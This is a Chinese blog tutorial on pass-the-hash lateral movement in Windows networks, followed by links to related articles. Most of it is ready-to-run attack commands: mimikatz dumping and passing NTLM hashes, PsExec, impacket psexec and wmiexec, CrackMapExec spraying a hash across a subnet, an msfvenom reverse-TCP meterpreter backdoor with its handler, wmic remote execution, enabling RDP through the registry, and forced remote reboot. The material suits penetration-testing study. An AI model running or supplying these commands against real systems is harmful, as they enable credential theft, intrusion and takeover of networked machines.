内网渗透之横向渗透PTH(pass-the-hash) HASH 传递(三)

于 2025-03-13 08:02:31 发布
阅读量417 收藏 6
点赞数 11
分类专栏: 内网渗透 文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_78851087/article/details/146221124
版权 


pass-the-hash 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接
通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。

pass the hash 原理:
• 在 Windows 系统中,通常会使用 NTLM 身份认证
• NTLM 认证不使用明文口令,而是使用口令加密后的 hash 值,hash 值由系
统 API 生成(例如 LsaLogonUser)

• hash 分为 LM hash 和 NT hash,如果密码长度大于 15,那么无法生成 LM
hash。从 Windows Vista 和 Windows Server 2008 开始,微软默认禁用 LM
hash
• 如果攻击者获得了 hash,就能够在身份验证的时候模拟该用户(即跳过调用
API 生成 hash 的过程)

这类攻击适用于:
• 域/工作组环境
• 可以获得 hash,但是条件不允许对 hash 爆破
• 内网中存在和当前机器相同的密码

微软也对 pth 打过补丁,然而在测试中发现,在打了补丁后,常规的 Pass The
Hash 已经无法成功,唯独默认的 Administrator(SID 500)账号例外,利用这个账号
仍可以进行 Pass The Hash 远程 ipc 连接。
如果禁用了 ntlm 认证,PsExec 无法利用获得的 ntlm hash 进行远程连接,但是使
用 mimikatz 还是可以攻击成功。
从 windows 到 windows 横向 pth 这一类攻击方法比较广泛。

mimitkaz pth

privilege::debug

sekurlsa::logonpasswords

获取hash值

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt

复制拿出来

627782b7274e323941c9418399460d5b

先输入

privilege::debug

在输入(本地连接)

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:627782b7274e323941c9418399460d5b

输入成功后 会弹出一个cmd窗口

在这个弹出的窗口执行命令 就相当于 我们在目标主机上执行cmd

我们也可以使用ip(远程)

sekurlsa::pth /user:administrator /domain:ip /ntlm:627782b7274e323941c9418399460d5b

psexec

psexec 是 windows 官方自带的,不会存在查杀问题,属于 pstools 利用 PsExec 可 以在远程计算机上执行命令,其基本原理是通过管道在远程目标主机上创建一个 psexec 服务,并在本地磁盘中生成一个名为 PSEXESVC 的二进制文件,然后通过 psexec 服务运行命令,运行结束后删除服务。

利用 SMB 服务可以通过明文或 hash 传递来远程执行,条件 445 服务端口开放。 对方开放 445 端口,就相当于开放了 smb 协议

psexec 第一种:先有 ipc 链接,psexec 需要明文或 hash 传递

PsExec64.exe /accepteula /s \\192.168.25.156 -u Administrator -p 123456 cmd
-accepteula 第一次运行 PsExec 会弹出确认框,使用该参数就不会弹出确认框
-s 以 System 权限运行远程进程,如果不用这个参数,就会获得一个对应用户权限的 s
hell
直接直接执行回显
-u 域\用户名
-p 密码
PsExec.exe /accepteula /s \\192.168.0.141 -u Administrator -p 123456 cm
d /c "ipconfig"

上面是建立在明文之上 下面 hash 下进行登录

出现这个错误可以使用 impacket 这个工具包下的 psexec 进行利用

出现这个错误可以使用 impacket 这个工具包下的 psexec 进行利用
python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b ./Administrator@192.168.25.153

在使用 PsExec 时需要注意以下几点:
• 需要远程系统开启 admin$ 共享(默认是开启的)
• 因为 PsExec 连接的原理是基于 IPC 共享,因此目标需要开放 445 端口
• 在使用 IPC$ 连接目标系统后,不需要输入账户和密码。
• 在使用 PsExec 执行远程命令时,会在目标系统中创建一个 psexec 的服务,
命令执行完后,psexec 服务将被自动删除。由于创建或删除服务时会产生
大量的日志,因此蓝队在溯源时可以通过日志反推攻击流程。
• 使用 PsExec 可以直接获得 System 权限的交互式 Shell 的前提目标是
administrator 权限的 shell • 在域环境测试时发现,非域用户无法利用内存中的票据使用 PsExec 功能,
只能依靠账号和密码进行传递。

登陆域管理命令
impacket 下的 psexec
python3 psexec.py moonsec/Administrator@192.168.25.155
执行命令后输入密码
登陆其他主机管理员
psexec /accepteula /s \\12server1 -u Administrator -p 123456 cmd

使用 msf hash 模块

msf 生成后门
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=6666 LHOST=192.168.25.138 -f exe -o msf.exe



msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.25.138
set lport 6666
exploit
use exploit/windows/smb/psexec
set SMBUser Administrator
set rhosts 192.168.25.161
set smbpass aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b

CrackMapExec

CrackMapExec 可以对 C 段中的主机进行批量 pth,项目地址:   crackmapexec
https://github.com/byt3bl33d3r/CrackMapExec.git
使用命令:
crackmapexec smb 192.168.25.0/24 -u administrator -H 627782b7274e323941c9418399460d5b
对 192.168.9.0/24 C 段进行批量 pass the hash

返回true的都是可以登陆成功的

WMI

WMI 全称 Windows Management Instrumentation 即 Windows 管理工具,
Windows 98 以后的操作系统都支持 WMI。
由于 Windows 默认不会将 WMI 的操作记录在日志里,同时现在越来越多的杀软将
PsExec 加入了黑名单,因此 WMI 比 PsExec 隐蔽性要更好一些。




wmic 命令

WMI 连接远程主机,并使用目标系统的 cmd.exe 执行命令,将执行结果保存在目
标主机 C 盘的 ip.txt 文件中
使用 WMIC 连接远程主机,需要目标主机开放 135 和 445 端口
( 135 端⼝是 WMIC 默认的管理端⼝,wimcexec 使⽤445 端⼝传回显)
wmic /node:192.168.25.166 /user:administrator /password:456789 process call create "cmd.exe /c ipconfig > c:\ip.txt"



之后建立 IPC$ ,使用 type 读取执行结果
net use \\192.168.0.123\ipc$ "123456" /user:administrator
type \\192.168.0.123\c$\ip.txt

wmiexec.py

在 impacket 工具包里有 wmiexec.py 脚本,可以用来直接获取 shell
其他攻击手法可以看下 readme,这里只简单的对 pth 做一下实验:
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b Administrator@192.168.25.166 "whoami"
wmiexec.py 的 hash 参数格式为 LM Hash:NT Hash
00000000000000000000000000000000 这个部分可以随便填写

wmiexec.py 明文获取 shell
python3 wmiexec.py administrator:456789@192.168.25.166

wmiexec.vbs

wmiexec.vbs 脚本通过 VBS 调用 WMI 来模拟 PsExec 的功能,wmiexec.vbs 
下载地址:https://github.com/k8gege/K8tools/blob/master/wmiexec.vbs
cscript //nologo wmiexec.vbs /shell 192.168.25.166 administrator 456789


使用 vmiexec.vbs 执行单条命令
cscript wmiexec.vbs /cmd 192.168.25.166 administrator 456789 "ipconfig"

在windows本机上执行

Invoke-WmiCommand


Invoke-WmiCommand.ps1 是 PowerSploit 工具包里的一部分,该脚本是利用
Powershell 调用 WMI 来远程执行命令。

在 Powershell 中运行以下命令
# 导入 Invoke-WmiCommand.ps1 脚本
Import-Module .\Invoke-WmiCommand.ps1

# 指定目标系统用户名
$User = ".\administrator"

# 指定目标系统的密码
$Password = ConvertTo-SecureString -String "456789" -AsPlainText -Force

# 将账号和密码整合起来,以便导入 Credential
$Cred = New-Object -TypeName System.Management.Automation.PSCredential-ArgumentList $User,$Password

# 指定要执行的命令和目标 IP
$Remote = Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName 192.168.25.166


$Remote = Invoke-WmiCommand -Payload {这里我们可以随便输入指令} -Credential $Cred -ComputerName 192.168.25.166

# 将执行结果输出到屏幕上
$Remote.PayloadOutput

Invoke-WMIMethod

Invoke-WMIMethod 是 PowerShell 自带的一个模块,也可以用它来连接远程计算
机执行命令和指定程序。

# 指定目标系统用户名
$User=".\administrator"

# 指定目标系统密码
$Password=ConvertTo-SecureString -String "456789" -AsPlainText -Force

# 将账号和密码整合起来,以便导入 Credential 中
$Cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password

# 在远程系统中运行 calc.exe 命令
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName "192.168.25.166" -Credential $Cred

然后我们就可以看到 目标主机有了 calc进程

wmic 的其他命令

使用 wmic 远程开启目标的 RDP

# 适于 Windows xp、server 2003
wmic /node:192.168.7.7 /user:administrator /password:123456 PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

# 适于 Windows 7、8、10,server 2008、2012、2016,注意 ServerName 需要改为目标的 hostname
wmic /node:192.168.25.166 /user:administrator /password:456789 RDTOGGLE WHERE ServerName='12server1' call SetAllowTSConnections 1
或者
wmic /node:192.168.0.123 /user:administrator /password:123456 process call create 'cmd.exe /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'



可以看到目标上的远程终端已经开启。
判断 RDP 有没有开可以使用以下命令,如果返回 0 表示开启,返回 1 表示关闭。
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections



远程重启机子
wmic /node:192.168.25.166 /user:administrator /password:456789 process call create "shutdown.exe -r -f -t 0"

内网渗透(十七)之横向移动篇-Pass the Hash 哈希传递攻击(PTH)横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-17 631
主流的Windows操作系统,通常会使用 NTLM Hash对访问资源的用户进行身份验证。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本 地管理员账号和密码,因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就能使用哈希传递攻击的方法登 录内网中的其他计算机。在Windows网络中,散列值就是用来证明身份的(有正确的用户名和密码散列值,就能通过验证),而微软自己的产品和 工具显然不会支持这种攻击,于是,攻击者往往会使用第方工具来完成任务。
[横向移动] Pass The HashPTH,哈希传递)攻击横向移动
最新发布
Blue17 の 小窝
03-18 992
而在 Windows 网络中,散列值是用来证明用户身份的(有正确的用户名和密码散列值,就能通过验证),而微软自己的产品和工具显然不会支持这种攻击,所以,通常情况下攻击者会采用第方工具来完成攻击。在上面那个方法中,我们 PTH 攻击成功后,还得远程桌面到靶机上,然后通过 IPC$ 才能横向移动,既麻烦,动作又大,那么有没有啥简单的方法来通过 PTH 上线内网其它机器呢?当用户需要登录某网站时,如果该网站使用明文的方式保存了用户的密码,那么,一旦该网站出现了安全漏洞,所有用户的明文密码就均会被泄露出去。
内网横传之哈希传递Pass The Hash
11-25 8208
本文主要讲述如何使用msf 进行hash 传递以及遇到的一些问题
p67 内网安全-域横向 smb&wmi 明文或 hash 传递
weixin_43263566的博客
04-24 658
p67 内网安全-域横向 smb&wmi 明文或 hash 传递
横向移动:横向传递攻击(SMB || WMI 明文或 hash 传递
网络安全领域___专研者.
06-09 3322
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)
横向移动-传递攻击SMB服务利用psexec&smbexec
m0_65096687的博客
05-28 1272
win2012以上版本,关闭了wdigest 或者安装了 KB287199补丁。无法获取明文密码总的来说就是win2012后无法获取明文密码解决办法就是:1.可以利用哈希hash传递pth,ptk等进行移动)2.利用其他服务协议(SMB,WMI)进行哈希hash移动3.注册表开启wdigest Auth 进行获取明文密码4.利用第方工具(hashcat)进行破解获取。
域环境PTH(pass-the-hash) HASH 传递
Longwaer
01-19 1779
学习了解域环境中PTH原理及利用方式,更快的掌握域环境。
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,域横向PTH、PTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
内网渗透—横向移动&NTLM-Relay重放攻击&Responder中继攻击
2301_76227305的博客
08-24 861
可以看到整个实验下来我是没有抓取hash或者密码的,但是仍可以成功横移的。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
内网安全()---横向渗透PTH&PTK&PTT
qi_SJQ_的博客
02-11 4576
域横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTHPTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
hash传递攻击
qq_58000413的博客
06-05 886
Pass the hash也就是Hash传递攻击,简称为PTH。模拟用户登录不需要用户明文密码只需要hash值就可以直接来登录目标系统。开启445端口开启ipc$共享。
内网渗透总结:第步利用明文或者hash进行横向移动
yggcwhat
05-06 1342
内网渗透总结:第步利用明文或者hash进行横向移动
内网渗透-域横向smb&wmin明文hash传递
weixin_60329395的博客
08-09 1896
该工具可配合minikatz进行明文获取,minikatz被查杀的情况下可使用tips:该工具为微软官方工具,不会被查杀Procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载成功后 导入到目标主机 使用CMD命令进行以下命令进行执行即使用该工具生成一个该主机的密码文件 执行成功,自动生成了一个lsass.dmp的文件 将该dmp文件放到自己本机上使用minikatz进行执行tips:将dmp文件放进min
内网安全-域横向smb&wmi明文或hash传递
xhscxj的博客
03-11 4136
知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(path,ptk等)进行移动 2.利用其他服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 4.利用工具或第方平台(Hachcat)进行破解获取 ...
渗透之哈希传递攻击及其原理
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-09 2706
哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。在学习哈希传递攻击之前我们先来了解一下其背后的Windows 底层协议和原理
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1765
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
weixin_45715461的博客
06-05 1640
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
哈希传递攻击(Pass-the-Hash
热门推荐
whoim_i的博客
12-25 1万+
目录使用msf进行哈希传递攻击使用mimikatz进行哈希传递攻击PTH(工作组) 使用msf进行哈希传递攻击 有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口(文件共享)打开着。我们则可以利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)(注意:只能是adminis...
内网横向渗透流量特征
01-14
Pass-the-Hash (PtH)Pass-the-Ticket (PtT) 技术允许攻击者无需知道明文密码即可冒充用户身份登录并获得权限。这类事件会在认证过程中留下痕迹,比如Kerberos票据授予票证(TGT)分发次数增多或是NTLM哈希验证失败...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值